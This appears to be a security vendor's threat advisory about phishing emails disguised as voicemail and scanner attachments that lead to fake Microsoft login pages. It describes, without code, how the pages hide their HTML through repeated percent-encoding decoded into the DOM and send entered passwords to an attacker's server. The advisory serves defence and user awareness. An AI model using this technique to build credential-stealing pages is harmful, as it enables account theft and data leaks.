The ASEC analysis team has recently discovered phishing emails disguised as Microsoft login pages.
As shown in the figure below, one of the collected samples is disguised as the company’s voice message to prompt users to click the attached playback file. Clicking the file redirects users to a phishing webpage disguised as a Microsoft login page.
Another sample is an attachment disguised as a file that is sent with a scanner, prompting users to click the attachment. Again, clicking the file redirects users to a phishing webpage disguised as a Microsoft login page.
For both samples, clicking the attachment redirects users to a webpage that looks similar to a Microsoft login webpage (see Figure 3 and 4). The webpage already has the email address entered and only requires users to fill in the password. As for the sample in Figure 4, the website first displays a webpage disguised as an auto-login process. It then acts as if the auto-login failed, redirecting users to a phishing webpage that requires user account credentials. Since the login process is similar to that of Microsoft, users may enter their passwords without doubting it.
The phishing webpages for the samples are created by decoding the percent-encoding string within the script and writing it in the DOM (see Figure 5), with the decoding process performed repeatedly. Removing the encoding with unescape shows the HTML that will be ultimately rendered (see Figure 6).
After entering the password and clicking the login button from the phishing website, the password is sent to the attacker’s server unrelated to Microsoft (see Figure 7).
As the attacker can gain access to the user’s company email account with the stolen account credentials and leak sensitive information, extreme caution is advised.
Users should refrain from opening attachments in emails from unknown sources and entering account credentials in suspicious webpages.
AhnLab is currently blocking the domain of this phishing page.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.